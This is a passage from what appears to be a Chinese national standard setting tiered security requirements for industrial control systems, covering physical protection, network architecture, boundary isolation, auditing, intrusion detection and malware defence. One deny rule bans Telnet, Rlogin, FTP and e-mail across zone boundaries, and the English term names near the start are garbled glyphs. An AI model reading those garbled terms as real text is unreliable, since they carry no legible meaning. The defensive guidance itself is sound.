犳犻犲犾犱犪狌狓犻犾犻犪狉狔狉狅狅犿 位于组织内生产现场,用于安装工业控制系统机柜及其他设备的场所。 3.5 控制设备 犮狅狀狋狉狅犾犲狇狌犻狆犿犲狀狋 工业生产过程中用于控制执行器以及采集传感器数据的装置。 注:包括 DCS现场控制单元、PLC以及 RTU等进行生产过程控制的单元设备。 3.6 工业主机 犻狀犱狌狊狋狉犻犪犾犺狅狊狋 工业生产控制各业务环节涉及组态、工作流程和工艺管理、状态监控、运行数据采集以及重要信息 存储等工作的设备。 注:包括工程师站、操作员站、服务器等。 3.7 双机热备 犱狌犪犾 犿犪犮犺犻狀犲犺狅狋狊狋犪狀犱犫狔 通过网络连接主机和从机,正常情况下主机处于工作状态,从机处于监视状态,一旦主机异常,从机 自动代替主机。 4 缩略语 下列缩略语适用于本文件。 APT:高级持续性威胁(AdvancedPersistentThreat) CPE:客户前置设备(CustomerPremiseEquipment) DCS:分布式控制系统(DistributedControlSystem) DNP:分布式网络协议(DistributedNetworkProtocol) FTP:文本传输协议(FileTransferProtocol) HMI:人机界面(HumanMachineInterface) HTTPS:以安全为目标的超文本传输协议通道(HyperTextTransferProtocoloverSecureSocket Layer) ICS:工业控制系统(IndustrialControlSystem) IEC:国际电工委员会(InternationalElectrotechnicalCommission) IP:互联网协议(InternetProtocol) IPSec:互联网安全协议(InternetProtocolSecurity) MAC:媒体存取控制(MediaAccessControl) OLE:对象连接与嵌入(ObjectLinkingandEmbedding) OPC:用于过程控制的 OLE(OLEforProcessControl) PLC:可编程逻辑控制器(ProgrammableLogicController) RPO:恢复点目标(RecoveryPointObjective) RTO:恢复时间目标(RecoveryTimeObjective) RTU:远程终端单元(RemoteTerminalUnit) SCADA:监视控制与数据采集(SupervisoryControlandDataAcquisition) SNMP:简单网络管理协议(SimpleNetworkManagementProtocol) SSH:安全外壳(SecureShell) SSL:安全套接层(SecureSocketLayer) TCP:传输控制协议(TransmissionControlProtocol) VPN:虚拟专用网络(VirtualPrivateNetwork) WAF:网络应用防火墙(WebApplicationFirewall) 5 概述 5 . 1 犐犆犛基本构成 按 GB/T36324 — 2018中 4 . 1,ICS包括但不限于以下部分。 a) 核心组件:包括 SCADA、DCS、PLC等控制系统和控制设备,以及各组件通信的接口单元。 b) 控制过程:由控制回路、工业主机、远程诊断与维护工具三部分完成,控制回路用以控制逻辑运 算,工业主机执行信息交换,远程诊断与维护工具用于出现异常操作时进行诊断和恢复。 c) 结构层次:参考 GB/T22239 — 2019中附录 G,ICS及相关联系统从上到下共分为企业资源层、 生产管理层、过程监控层、现场控制层和现场设备层等五层。 在实际工业生产环境中,可出现 相邻两层的功能由一个系统、设备来实现,即在物理上并未分开。 5 . 2 安全防护对象和目的 本文件中ICS安全防护对象包括:现场设备层、现场控制层和过程监控层工业控制资产。 本文件给出了物理环境安全防护等八项技术要求指标和软件开发安全防护等两项保障要求指标, 安全防护目的包括如下内容。 a) 安全防护技术要求: 1) 物理环境安全防护的目的是防止人员未经授权访问、损坏和干扰ICS资产,避免受到外部 物理环境因素影响,保护ICS的外部运行环境; 2) 网络通信安全防护的目的是保护ICS中传输的数据的完整性和保密性,维护 ICS内部以 及与外部网络之间信息的安全传输; 3) 网络边界安全防护的目的是安全访问ICS,避免非授权访问,及时发现并有效保护 ICS免 受恶意入侵和攻击,部分行业的应用场景见附录 A; 4) 工业主机安全防护的目的是有效控制工业主机访问行为,避免非授权访问,防止工业主机 受到非法入侵或造成工业数据泄漏; 5) 控制设备安全防护的目的是安全访问控制设备,阻止非授权访问,避免控制设备受到恶意 入侵、攻击或非法控制; 6) 数据安全防护的目的是保护数据全生存周期的完整性和保密性,防止未经授权使用和处 理数据、恶意篡改和窃取数据等现象发生,数据安全防护对象见附录 B; 7) 防护产品安全的目的是产品功能安全可靠、管控策略有效,避免因产品自身功能缺陷给 ICS的正常运行带来安全隐患; 8) 系统集中管控的目的是集中维护和管控ICS,统一制定与部署安全策略,集中响应安全事 件,典型部署方式见附录 C。 b) 安全防护保障要求: 1) 软件开发安全防护的目的是控制ICS软件的安全开发,避免软件自身存在安全隐患; 2) 系统维护安全防护的目的是有效控制系统维护过程,避免系统在维护过程中受到干扰、恶 意入侵,或发生数据泄露、被破坏或篡改等现象。 本文件提出的安全防护技术要求和保障要求分为四个等级,与 GB/T22239 — 2019、GB/T36324 — 2018提出的相应安全保护等级要求保持一致,并按梯次推进的方式给出了不同安全保护等级 ICS所对 应的技术要求和保障要求。 测试评价方法是针对ICS运营单位执行本文件安全防护技术要求和保障要求的情况进行测试评 价的一般方法,也可根据自身关注点自行调整测试评价指标。 测试评价流程见附录 D。 5 . 3 安全防护措施的约束条件 ICS安全防护措施的约束条件包括: a) ICS采用的网络边界隔离等技术防护手段应符合国家和所在行业规定要求,并采用经具备资 格的第三方机构检测合格的安全产品; b) 数据传输和存储过程中所采用的密码技术应经过国家密码主管部门核准; c) ICS与涉密信息系统之间连接应符合国家保密规定和相关标准要求; d) 任何情况下都不应因采用安全防护技术措施而影响ICS的正常运行或对系统的安全功能产生 不利影响,例如:不应锁定用于基本功能的账户、不应因部署安全措施而显著增加延迟并影响 系统的响应时间、不应因安全措施失效导致系统的基本功能中断等; e) 在符合本文件提出的技术要求时,如经评估对可用性有较大影响而无法实施,可调整要求并研 究制定相应的补偿防护措施,但采取补偿防护措施后不应降低原有要求的整体安全防护强度。 6 安全防护技术要求 6 . 1 物理环境安全防护 6 . 1 . 1 位置选择 6 . 1 . 1 . 1 第 一 级 机房、中心控制室、现场控制室应位于具有防震能力的建筑物内,并应具有所在建筑物符合当地抗 震设防标准的证明。 6 . 1 . 1 . 2 第二级 本项要求包括: a) 应符合 6 . 1 . 1 . 1; b) 机房、中心控制室、现场控制室应避免设在建筑物的高层或地下室,以及用水设备的下层或隔 壁,如不可避免,应采取有效的防水、防潮措施。 6 . 1 . 1 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 1 . 1 . 2; b) 机房、中心控制室、现场控制室应避开发生火灾危险程度高的区域; c) 机房、中心控制室、现场控制室应避开产生粉尘、油烟、有害气体源以及存放腐蚀、易燃、易爆物 品的地方; d) 机房、中心控制室、现场控制室应避开低洼、潮湿、落雷、重盐害区域和地震频繁的地方; e) 机房、中心控制室、现场控制室应避开强振动源和强噪声源; f) 机房、中心控制室、现场控制室应避开强电磁干扰源; g) 如以上无法避免,应采取相应措施。 6 . 1 . 2 访问控制 6 . 1 . 2 . 1 第 一 级 ~第二级 本项要求包括: a) 来访人员进入机房、中心控制室、现场控制室前应提出申请并通过审批,应记录其随身携带的 设备、进出时间和工作内容,应有专人陪同并限制和监控其活动范围; b) 机房、中心控制室出入口应安排专人值守或配置电子门禁系统,控制、识别和记录人员的进出, 人员进出记录应至少保存六个月。 6 . 1 . 2 . 2 第三级 本项要求包括: a) 应对机房、中心控制室、现场控制室划分不同管理区域,应将设备区域和维护操作区域分离; b) 应对主机房、中心控制室、现场控制室的重要工程师站、数据库、服务器等核心工业控制资产所 在区域采取视频监控或专人值守等防护措施; c) 来访人员进入主机房、中心控制室、现场控制室前应提出申请并通过审批,应记录其随身携带 的设备、进出时间和工作内容,应有专人陪同并限制和监控其活动范围;设备使用前应进行系 统扫描、使用过程中应进行行为监测、带出前应对工作日志等进行审计; d) 机房、中心控制室出入口应配置电子门禁系统,控制、识别和记录人员的进出,人员进出记录应 至少保存六个月。 6 . 1 . 2 . 3 第四级 本项要求包括: a) 应符合 6 . 1 . 2 . 2; b) 主机房、中心控制室的重要区域应配置第二道电子门禁系统,控制、识别和记录人员的进出,人 员进出记录应至少保存六个月。 6 . 1 . 3 防盗窃和防破坏 6 . 1 . 3 . 1 第 一 级 本项要求包括: a) 应将服务器、路由器、交换机等主要设备放置在主机房、中心控制室或现场控制室等建筑物内; b) 应将室外控制设备安装在采用金属材料制作且具有防盗能力的箱体或装置中; c) 应将设备或主要部件进行固定,并设置明显的不易除去的粘贴标签或铭牌等标记。 6 . 1 . 3 . 2 第二级 本项要求包括: a) 应符合 6 . 1 . 3 . 1; b) 应将通信线缆铺设在隐蔽处,可铺设在管道中。 6 . 1 . 3 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 1 . 3 . 2; b) 应采用光、电等技术设置机房、中心控制室、现场控制室防盗报警系统或设置有专人值守的视 频监控系统; c) 应对机房、中心控制室、现场控制室的控制台等重要区域进行视频监控,监控记录应至少保存 三个月。 6 . 1 . 4 防雷击 6 . 1 . 4 . 1 第 一 级 ~第二级 本项要求包括: a) 应对室外控制设备电源、信号线路加装避雷器或浪涌保护器,并将金属管线就近接地; b) 应根据室外控制设备分布,在设备集中位置设置接地汇流排、均压环、均压网等等电位连接装 置;所有设备、金属机架、外壳、管、槽等应就近接地,并应符合等电位连接要求; c) 机房、中心控制室、现场控制室、现场机柜室应在所在建筑物防雷措施基础上采取加强防雷击 措施; d) 机房、中心控制室、现场控制室、现场机柜室等各类机柜、设施和设备等应通过接地系统安全 接地。 6 . 1 . 4 . 2 第三级 ~第四级 本项要求包括: a) 应符合 6 . 1 . 4 . 1; b) 应对机房、中心控制室、现场控制室、现场机柜室所在建筑物设置防雷保安器或过压保护装置 等防感应雷措施。 6 . 1 . 5 防火 6 . 1 . 5 . 1 第 一 级 本项要求包括: a) 应将室外控制设备安装在采用金属材料或其他防火隔热材料制作且具有防火能力的箱体或装 置中; b) 机房、中心控制室、现场控制室、现场机柜室应配置灭火器,配置的灭火器类型、规格、数量和位 置应符合国家标准的要求,灭火所用的介质不宜造成二次破坏。 6 . 1 . 5 . 2 第二级 本项要求包括: a) 应符合 6 . 1 . 5 . 1; b) 机房、中心控制室、现场控制室、现场机柜室应设置火灾自动消防系统,应能自动检测火情、自 动报警,并应具有自动灭火功能; c) 机房、中心控制室、现场控制室的内部装修材料应采用符合国家标准的难燃烧材料和非燃烧 材料。 6 . 1 . 5 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 1 . 5 . 2; b) 应对机房、中心控制室、现场控制室划分不同管理区域,区域间应设置隔离防火措施,并应将重 要设备和其他设备隔开; c) 当机房作为独立建筑物时,建筑物的耐火等级应不低于该建筑物所对应的设计防火规范中规 定的二级耐火等级; d) 当机房位于其他建筑物内时,该机房与其他部位之间应设置耐火等级不低于 2h的隔墙或隔 离物,隔墙上的门应采用符合国家标准的甲级防火门。 6 . 1 . 6 防水和防潮 6 . 1 . 6 . 1 第 一 级 本项要求包括: a) 应将室外控制设备安装在采用金属材料或其他材料制作且具有防水能力的箱体或装置中; b) 无关的给排水管道不应穿过机房、中心控制室、现场控制室,相关的给排水管道应有可靠的防 渗漏措施; c) 机房、中心控制室、现场控制室外墙壁应采用无窗设计或采用双层固定窗并作密封、防水处理; d) 如机房、中心控制室、现场控制室周围有用水设备,应有防渗水和导流措施; e) 应采取措施防止雨水通过机房、中心控制室、现场控制室的窗户、屋顶和墙壁渗透到机房、中心 控制室、现场控制室内。 6 . 1 . 6 . 2 第二级 本项要求包括: a) 应符合 6 . 1 . 6 . 1; b) 应采取措施防止机房、中心控制室、现场控制室内发生凝露和地下积水转移或渗漏现象。 6 . 1 . 6 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 1 . 6 . 2; b) 应安装对水敏感的检测仪表或传感器,并对机房、中心控制室、现场控制室应在漏水隐患处设 置漏水检测报警系统。 6 . 1 . 7 防静电 6 . 1 . 7 . 1 第 一 级 ~第二级 本项要求包括: a) 机房、各控制室、现场机柜室应采用防静电地板或地面; b) 应对机房、各控制室、现场机柜室内的设备采取必要的接地防静电措施; c) 机房、各控制室、现场机柜室内易产生静电的地方,可采用静电消除剂和静电消除器; d) 室外控制设备应就近接地,并应设置人工接地装置。 6 . 1 . 7 . 2 第三级 ~第四级 本项要求包括: a) 应符合 6 . 1 . 7 . 1; b) 应符合 GB/T22239 — 2019中 8 . 1 . 1 . 7b) 。 6 . 1 . 8 防爆 本项要求包括: a) 对于存在爆炸危险的组织,主机房、中心控制室应位于爆炸危险区域外,其建筑物的建筑结构 应根据抗爆强度分析结果进行设计; b) 对于存在爆炸危险的生产车间(装置),现场控制室、现场机柜室应位于爆炸危险区域外,应根据安全专业抗爆强度分析结果确定是否设计为抗爆结构,应根据不同的易爆因素设置监测报 警装置。 6 . 1 . 9 防鼠害 本项要求包括: a) 应采用防火材料封堵机房、中心控制室、现场控制室、现场机柜室的孔、洞; b) 应对易受鼠害的机房、中心控制室、现场控制室、现场机柜室内的缆线采取防护措施。 6 . 1 . 10 温湿度控制 6 . 1 . 10 . 1 第 一 级 本项要求包括: a) 应在机房内设置必要的温、湿度调节装置,并使温、湿度控制在设备工作允许范围内,其中:开 机时温度、相对湿度和温度变化率宜符合 GB/T2887 — 2011表 2中 C级要求,停机时温度、相 对湿度和温度变化率宜符合 GB/T2887 — 2011表 3中 C级要求;应有对主机房内的温、湿度 监测记录; b) 应在中心控制室、现场控制室和现场机柜室内设置必要的温、湿度调节装置,并使温、湿度控制 在设备工作允许范围内,其中:温度宜控制在冬季 20℃±2℃、夏季 24 ℃±2 ℃,温度变化率 小于 5℃/h;相对湿度宜控制在 40%~60%,湿度变化率小于 6%/h; c) 按 GB/T7353 — 1999中 6 . 9,工业控制(台)柜环境温度应控制在 -5℃~40℃,相对湿度应控 制在 40%~90% 。 6 . 1 . 10 . 2 第二级 ~第四级 本项要求包括: a) 应符合 6 . 1 . 10 . 1b)和 c); b) 应在机房内设置必要的温、湿度调节装置,并使温、湿度控制在设备工作允许范围内,其中:开 机时温度、相对湿度和温度变化率宜符合 GB/T2887 — 2011表 2中 B级要求,停机时温度、相 对湿度和温度变化率宜符合 GB/T2887 — 2011表 3中 B级要求;应有对主机房内的温、湿度 监测记录装置。 6 . 1 . 11 电力供应 6 . 1 . 11 . 1 第 一 级 应在机房、中心控制室供电系统中设置稳压稳频装置和过电压防护设备,供电系统的容量应具有一 定的余量。 6 . 1 . 11 . 2 第二级 本项要求包括: a) 应符合 6 . 1 . 11 . 1; b) 应为机房、中心控制室、现场控制室、现场机柜室配备不间断电源等短期备用电力供应装置,并 应满足设备在断电情况下的持续供电时间不低于 20min。 6 . 1 . 11 . 3 第三级 本项要求包括: a) 应符合 6 . 1 . 11 . 2; b) 应采用冗余或并行的电力电缆线路为机房、中心控制室的计算机系统供电,输入电源应采用双 路市电自动切换供电方式。 6 . 1 . 11 . 4 第四级 本项要求包括: a) 应符合 6 . 1 . 11 . 3; b) 应为机房、中心控制室设置双路市电(或市电、备用柴油发电机)和不间断电源系统,并应满足 为关键设备在断电情况下持续供电 2h以上。 6 . 1 . 12 电磁防护 6 . 1 . 12 . 1 第 一 级 本项要求包括: a) 处于强电磁干扰区和有保密要求的机房应设置电磁屏蔽室; b) 应符合 GB/T22239 — 2019中 6 . 5 . 1 . 1b) 。 6 . 1 . 12 . 2 第二级 本项要求包括: a) 应符合 6 . 1 . 12 . 1; b) 应符合 GB/T22239 — 2019中 7 . 1 . 1 . 10; c) 电力电缆不宜穿过中心控制室、现场控制室,当受条件限制需要穿过时,应采取屏蔽措施; d) 对集中存储、处理、传输敏感数据的设备,应考虑电磁信息泄露防护措施。 6 . 1 . 12 . 3 第三级 本项要求包括: a) 应符合 6 . 1 . 12 . 2; b) 应采用接地方式防止外界电磁干扰和设备寄生耦合干扰; c) 应对重要工艺控制环路所涉及设备采取免受无线注入攻击和干扰的风险防护措施; d) 应对涉及敏感数据的关键设备和磁媒体采取防敏感信息泄露或受到电磁攻击的电磁屏蔽 措施。 6 . 1 . 12 . 4 第四级 本项要求包括: a) 应符合 6 . 1 . 12 . 3[6 . 1 . 12 . 3d)除外]; b) 应对涉及敏感数据的关键设备和磁媒体或关键区域采取防敏感信息泄露或受到电磁攻击的电 磁屏蔽措施。 6 . 2 网络通信安全防护 6 . 2 . 1 网络架构 6 . 2 . 1 . 1 第 一 级 本项要求包括: a) 应绘制与当前相符的ICS网络拓扑图,整理设备清单和核心网络设备配置文件并定期备份更 新,主要包括:设备名称、型号、网络地址等信息以及网段划分、路由、安全策略配置等信息; b) ICS应单独划分网络区域,并应与组织其他信息系统位于不同的网络区域内; c) 应根据ICS区域重要性和业务需求进行安全区域划分,系统不同层次之间、同一层次不同业务 单元之间应划分为不同的安全防护区域; d) 应对ICS的开发、测试、运维和生产分别提供独立环境; e) 应通过路由控制在业务终端与业务服务器之间建立安全的访问路径。 6 . 2 . 1 . 2 第二级 本项要求包括: a) 应符合 6 . 2 . 1 . 1; b) 应符合 GB/T22239 — 2019中 7 . 1 . 2 . 1b); c) 应符合 GB/T22239 — 2019中 7 . 5 . 2 . 1c) 。 6 . 2 . 1 . 3 第三级 本项要求包括: a) 应符合 6 . 2 . 1 . 2; b) 单个ICS可单独划分安全域并可划分独立子网,每个安全域应尽量少设置网络出口; c) 网络设备的业务处理能力应满足业务高峰期需要,并具备冗余空间; d) 网络各个部分的带宽应满足业务高峰期需要,并具备冗余空间; e) 通信线路、关键网络设备和关键计算设备的硬件应进行冗余配置。 6 . 2 . 1 . 4 第四级 本项要求包括: a) 应符合 6 . 2 . 1 . 3; b) 应符合 GB/T22239 — 2019中 9 . 1 . 2 . 1f) 。 6 . 2 . 2 通信传输 6 . 2 . 2 . 1 第 一 级 本项要求包括: a) ICS与组织其他信息系统之间交换数据时,应在网络接口处对应用协议报文进行分析,并应通 过访问控制机制控制两网之间的数据交换行为,仅允许交换符合安全策略的指定格式的数据; b) ICS内部不同安全域之间进行信息交换时,应对 OPC、Profinet等工业控制协议的数据包进行 解析,并能及时发现异常通信行为; c) 现场控制设备与工程师站等上位监控系统之间应使用唯一 的信息交换接口接收所有数据并对 用户的合法性进行验证; d) 数据传输过程中安全设备不应对ICS的实时性产生影响; e) 应符合 GB/T22239 — 2019中 6 . 1 . 2 . 1 。 6 . 2 . 2 . 2 第二级 本项要求包括: a) 应符合 6 . 2 . 2 . 1; b) 通过广域网交换控制指令或相关数据时,应采用加密认证技术实现身份鉴别、访问控制和数据 加密传输。 6 . 2 . 2 . 3 第三级 本项要求包括: a) 应符合 6 . 2 . 2 . 2[6 . 2 . 2 . 1e)除外]; b) 应符合 GB/T22239 — 2019中 8 . 1 . 2 . 2a); c) 应符合 GB/T22239 — 2019中 8 . 1 . 2 . 2b); d) 应符合 GB/T22239 — 2019中 8 . 5 . 3 . 3c) 。 6 . 2 . 2 . 4 第四级 本项要求包括: a) 应符合 6 . 2 . 2 . 3[6 . 2 . 2 . 3b)除外]; b) 应符合 GB/T22239 — 2019中 9 . 1 . 2 . 2a); c) 通信前应采用 SSL、IPSec等基于密码技术的协议对通信双方进行会话初始化验证,并应在通 过加解密验证后通信; d) 应符合 GB/T22239 — 2019中 9 . 1 . 2 . 2d) 。 6 . 2 . 3 网络设备防护 6 . 2 . 3 . 1 第 一 级 本项要求包括: a) 应对登录网络设备的用户进行身份鉴别; b) 应通过采取结束会话、限制非法登录次数和网络登录连接超时自动退出等策略,实现登录失败 处理功能; c) 非法登录次数达到预设值时,应记录相应日志,并向网络管理主机发送报警信息; d) 对网络设备进行远程管理时,应采取防止鉴别信息在网络传输过程中被窃取的措施。 6 . 2 . 3 . 2 第二级 本项要求包括: a) 应符合 6 . 2 . 3 . 1; b) 应及时修改默认用户和默认口令,口令长度应不少于 8位且为字母、数字或特殊字符的组合, 用户名和口令不应相同,不应明文存储口令,每三个月应更换一 次口令; c) 网络设备的标识应唯一,不应使用网络地址等易被仿冒的设备标识; d) 同一 网络设备的用户标识应唯一,多个人员不应共用一个账号; e) 应对网络设备的管理员登录地址进行限制; f) 应关闭不需要的网络端口和服务,如使用 SNMP服务,应采用安全性增强版本,并应设定复杂 的共享控制字段,不应使用公共或私有的默认字段。 6 . 2 . 3 . 3 第三级 本项要求包括: a) 应符合 6 . 2 . 3 . 2; b) 应实现管理员等设备特权用户的权限分离,如系统不支持,应通过采取其他技术措施对管理员的操作行为进行审计,且管理员无权对审计记录进行操作。 6 . 2 . 3 . 4 第四级 本项要求包括: a) 应符合 6 . 2 . 3 . 3; b) 应采用口令、密码和生物识别等两种或两种以上组合的鉴别方式对用户身份进行鉴别,且其中 至少一种鉴别方式应使用密码技术实现。 6 . 2 . 4 可信验证 6 . 2 . 4 . 1 第 一 级 应符合 GB/T22239 — 2019中 6 . 1 . 2 . 2 。 6 . 2 . 4 . 2 第二级 应符合 GB/T22239 — 2019中 7 . 1 . 2 . 3 。 6 . 2 . 4 . 3 第三级 应符合 GB/T22239 — 2019中 8 . 1 . 2 . 3 。 6 . 2 . 4 . 4 第四级 应符合 GB/T22239 — 2019中 9 . 1 . 2 . 3 。 6 . 3 网络边界安全防护 6 . 3 . 1 安全区域划分 本项要求包括: a) ICS与组织其他信息系统间应具有明确的网络边界; b) 应基于自身业务特点将ICS内部划分为不同的安全域,安全域的划分应有利于在同 一 安全域 内部署统一 的安全防护策略,并能对内部数据的访问和传输进行合理控制; c) 应将ICS的开发、测试和生产环境分别置于不同的网络区域,区域间应进行物理或逻辑隔离。 6 . 3 . 2 边界隔离 6 . 3 . 2 . 1 第 一 级 本项要求包括: a) ICS与组织管理信息系统等其他系统间应采取技术隔离措施; b) ICS内部不同安全域之间应部署具有访问控制功能或具有相当功能的安全隔离设备。 6 . 3 . 2 . 2 第二级 本项要求包括: a) 应符合 6 . 3 . 2 . 1; b) 应在ICS内部不同安全域之间采取必要的边界隔离机制,对接入ICS的设备进行识别和管控, 仅允许经过授权的设备接入系统,并在防护机制失效时及时进行报警。 6 . 3 . 2 . 3 第三级 本项要求包括: a) 应符合 6 . 3 . 2 . 2[6 . 3 . 2 . 1a)除外]; b) ICS与组织管理信息系统等其他系统之间应进行物理隔离,如有信息交换需求,应采用单向技 术隔离手段,单向隔离装置的策略配置应安全有效; c) ICS与广域网的纵向交界处应设置访问控制设备,设备的策略配置应安全有效,并应实现双向 身份核验、访问控制和数据加密传输; d) 应符合 GB/T22239 — 2019中 8 . 1 . 3 . 1b); e) 应符合 GB/T22239 — 2019中 8 . 1 . 3 . 1c); f) 应采取无线安全检测防护措施并识别和阻断未经授权的无线设备接入工业控制网络,应具有 对无线扫描、无线破解、无线拒绝服务等攻击行为进行检测和阻断的功能。 6 . 3 . 2 . 4 第四级 本项要求包括: a) 应符合 6 . 3 . 2 . 3; b) 应在ICS不同区域边界采用ICS专用防火墙等访问控制设备,对 OPC、Profinet等常见工业控 制协议进行深度包检测和恶意代码过滤,对进出区域边界的数据进行控制,阻止非授权访问、 常见网络攻击以及利用工业控制协议漏洞伪装成工业控制协议报文而进行的高级攻击,并在 防护机制失效时及时报警; c) 应符合 GB/T22239 — 2019中 9 . 1 . 3 . 1e); d) 应符合 GB/T22239 — 2019中 9 . 1 . 3 . 1f) 。 6 . 3 . 3 访问控制 6 . 3 . 3 . 1 第 一 级 本项要求包括: a) 应在ICS与组织其他信息系统之间设置访问控制规则,部署访问控制设备,默认情况下受控接 口仅允许交换符合安全策略的指定格式的数据,禁用任何穿越区域边界的 E Mail、Telnet、 Rlogin、FTP等通用网络服务; b) 应符合 GB/T22239 — 2019中 6 . 1 . 3 . 2b); c) 应符合 GB/T22239 — 2019中 6 . 1 . 3 . 2c); d) 应符合 GB/T22239 — 2019中 6 . 5 . 3 . 2a); e) 应符合 GB/T22239 — 2019中 6 . 5 . 3 . 2b); f) 应对各类物联网感知终端接入设置身份鉴别机制,边界访问控制机制应具有隔离功能,可设置 数据包的源和目的端口号、网络地址和 MAC地址绑定等规则,包括添加、删除、修改、复制、导 入、导出和保存规则等。 6 . 3 . 3 . 2 第二级 本项要求包括: a) 应符合 6 . 3 . 3 . 1[6 . 3 . 3 . 1e)除外]; b) 应根据网络边界安全控制策略,通过检查数据包的源地址、目的地址、传输协议、所请求的服务 等,及时制止不符合安全控制策略的数据包进出该边界; c) 应能根据会话状态信息为数据流提供允许或拒绝访问的能力,控制粒度为端口级; d) 应根据数据的敏感标记允许或拒绝数据通过网络边界; e) 边界的网络控制设备应根据用户与系统之间的允许访问规则,允许或拒绝对受控系统的资源 访问,控制粒度为单个用户; f) 部署在ICS区域边界的ICS专用防火墙等访问控制设备应具备双机热备能力,当主防火墙自 身出现断电或其他软硬件故障时,备用防火墙应能及时发现并接管主防火墙进行工作; g) 按 GB/T22239 — 2019中 7 . 5 . 3 . 2; h) 应对所有参与无线通信的用户(人员、软件进程或设备)进行授权以及执行或使用进行限制。 6 . 3 . 3 . 3 第三级 本项要求包括: a) 应符合 6 . 3 . 3 . 2; b) 应符合 GB/T22239 — 2019中 8 . 5 . 3 . 2b); c) 应符合 GB/T22239 — 2019中 8 . 5 . 3 . 3d) 。 6 . 3 . 3 . 4 第四级 本项要求包括: a) 应符合 6 . 3 . 3 . 3; b) 应符合 GB/T22239 — 2019中 9 . 1 . 3 . 2e); c) 应符合 GB/T22239 — 2019中 9 . 5 . 3 . 2c) 。 6 . 3 . 4 安全审计 6 . 3 . 4 . 1 第 一 级 无要求。 6 . 3 . 4 . 2 第二级 本项要求包括: a) 应在ICS网络边界、ICS内部不同安全区域边界以及重要网络节点部署专用审计设备,或启动 网络设备(系统)的审计功能并进行安全审计,审计范围应覆盖到ICS的每个用户,审计内容应 包括:设备运行状况、网络流量、用户行为、重要系统命令使用和重要安全事件等; b) 审计测试仅限于对软件和数据的只读访问,非只读的访问仅用于对系统文件的单独复制,审计 完成时应擦除这些复制或按审计文件要求保留这些文件并给予适当保护; c) 如审计测试会影响系统的可用性,应在非业务时间进行; d) 应具备使用内部时钟为审计记录生成日期和时间等时间戳的功能; e) 应能发现并发出审计失败的警告,并具备重启审计的功能; f) 应定义审计阈值,当存储空间接近极限时,应采取备份覆盖等安全措施以正常执行审计功能; g) 当审计要求和活动涉及对运行系统验证时,应事先与管理者确定访问系统和数据的审计要求 并获批准; h) 应对网络系统中的网络设备运行状况、网络流量、用户行为等进行日志记录和保护并定期备 份,避免受到未预期的删除、修改或覆盖等,记录保存时间应不少于六个月; i) 应具备拒绝远程访问审计记录的功能,仅允许授权用户根据授权范围访问审计记录; j) 应根据ICS的统一安全策略实现集中审计,应定期自动统计分析所采集的审计记录并形成报告,应具备审计记录的查询、输出、备份等功能;对未列入集中审计范围的设备,应定期人工采 集审计数据、导入集中审计平台并进行统计分析; k) 应具备集中管理审计事件的能力,包括:用户登录/退出事件、连接超时事件、配置变更、时间/ 日期变更、审计接入、用户名/口令创建和修改等。 6 . 3 . 4 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 3 . 4 . 2; b) 应能对远程访问的用户行为、使用互联网的用户行为等单独进行行为审计和数据分析; c) 应具备保护审计工具和审计进程的功能,避免受到未授权访问、修改、删除或覆盖等行为的 破坏。 6 . 3 . 5 入侵防范 6 . 3 . 5 . 1 第 一 级 无要求。 6 . 3 . 5 . 2 第二级 本项要求包括: a) 应在网络和区域边界监视端口扫描、强力攻击、木马后门攻击、拒绝服务攻击、缓冲区溢出攻 击、碎片攻击和网络蠕虫攻击等攻击行为; b) 应在交换机、路由器等关键网络节点处采用入侵检测和防御技术,检测、防止或限制从外部或 从内部发起的网络攻击行为; c) 采用的入侵检测技术应支持对 OPC、Profinet等常见工业控制协议的识别和分析,并应对异常 的工业控制指令、数据进行识别和告警。 6 . 3 . 5 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 3 . 5 . 2; b) 应监视工业控制网络内的流量数据包,应实时获取数据包并用于检测分析,应能对蠕虫病毒、 木马等网络攻击特别是 APT等新型网络攻击行为进行检测和分析,且不影响工业控制设备正 常运行; c) 当检测到攻击行为时,应记录攻击源网络地址、目的网络地址、攻击类型、攻击目的、攻击时间 等,在发生严重入侵事件时应报警。 6 . 3 . 6 恶意代码防范 6 . 3 . 6 . 1 第 一 级 本项要求包括: a) ICS与组织其他信息系统之间通信时,应通过部署恶意行为防范机制对应用协议进行安全 检测; b) 应维护恶意代码库的升级和检测系统的更新,更新前应通过安全性和兼容性测试; c) 防恶意代码软件应能监测可能被用于感染系统和向其他系统传播恶意软件的应用程序的 活动; d) 应及时清理注册表、恶意锁定主页等被恶意软件修改的启动选项; e) 应及时清理系统中存在的木马、病毒和恶意代码程序。 6 . 3 . 6 . 2 第二级 本项要求包括: a) 应符合 6 . 3 . 6 . 1; b) 应在关键网络节点处采取恶意代码检测与防范手段并对网络中传输的恶意代码进行检测和清 除,维护恶意代码防护机制的升级和更新但不应影响正常的业务数据传输; c) 应支持检测已知的病毒、木马、蠕虫、勒索软件及针对 PLC的专用恶意代码; d) 应在检测到恶意代码时告警,并记录攻击源网络地址、目的网络地址、恶意代码类型名称、危害 程度、攻击时间、攻击方式和执行流程,应探测其攻击源头,实现对恶意软件的追溯。 6 . 3 . 6 . 3 第三级 ~第四级 本项要求包括: a) 应符合 6 . 3 . 6 . 2; b) 应在ICS网络和区域边界部署恶意代码防护设备,应能探测恶意入侵等行为并及时发送至安 全管理中心。 6 . 3 . 7 可信验证 6 . 3 . 7 . 1 第 一 级 应符合 GB/T22239 — 2019中 6 . 1 . 3 . 3 。 6 . 3 . 7 . 2 第二级 应符合 GB/T22239 — 2019中 7 . 1 . 3 . 6 。 6 . 3 . 7 . 3 第三级 应符合 GB/T22239 — 2019中 8 . 1 . 3 . 6 。 6 . 3 . 7 . 4 第四级 应符合 GB/T22239 — 2019中 9 . 1 . 3 . 6 。 6 . 4 工业主机安全防护 6 . 4 . 1 身份鉴别 6 . 4 . 1 . 1 第 一 级 本项要求包括: a) 主机设备使用前应标识,并保持设备标识在整个生存周期的唯一性; b) 在启动移动工程师站等移动主机设备并接入ICS时,应对设备的真实性进行鉴别; c) 应强化工业主机的登录账户及口令,重命名或删除默认账户,修改默认账户的默认口令; d) 应对登录的用户身份进行标识和鉴别,标识具有唯一性; e) 用户身份认证证书的传输和存储应安全可靠,应避免在未授权的情况下使用证书,不应在不同 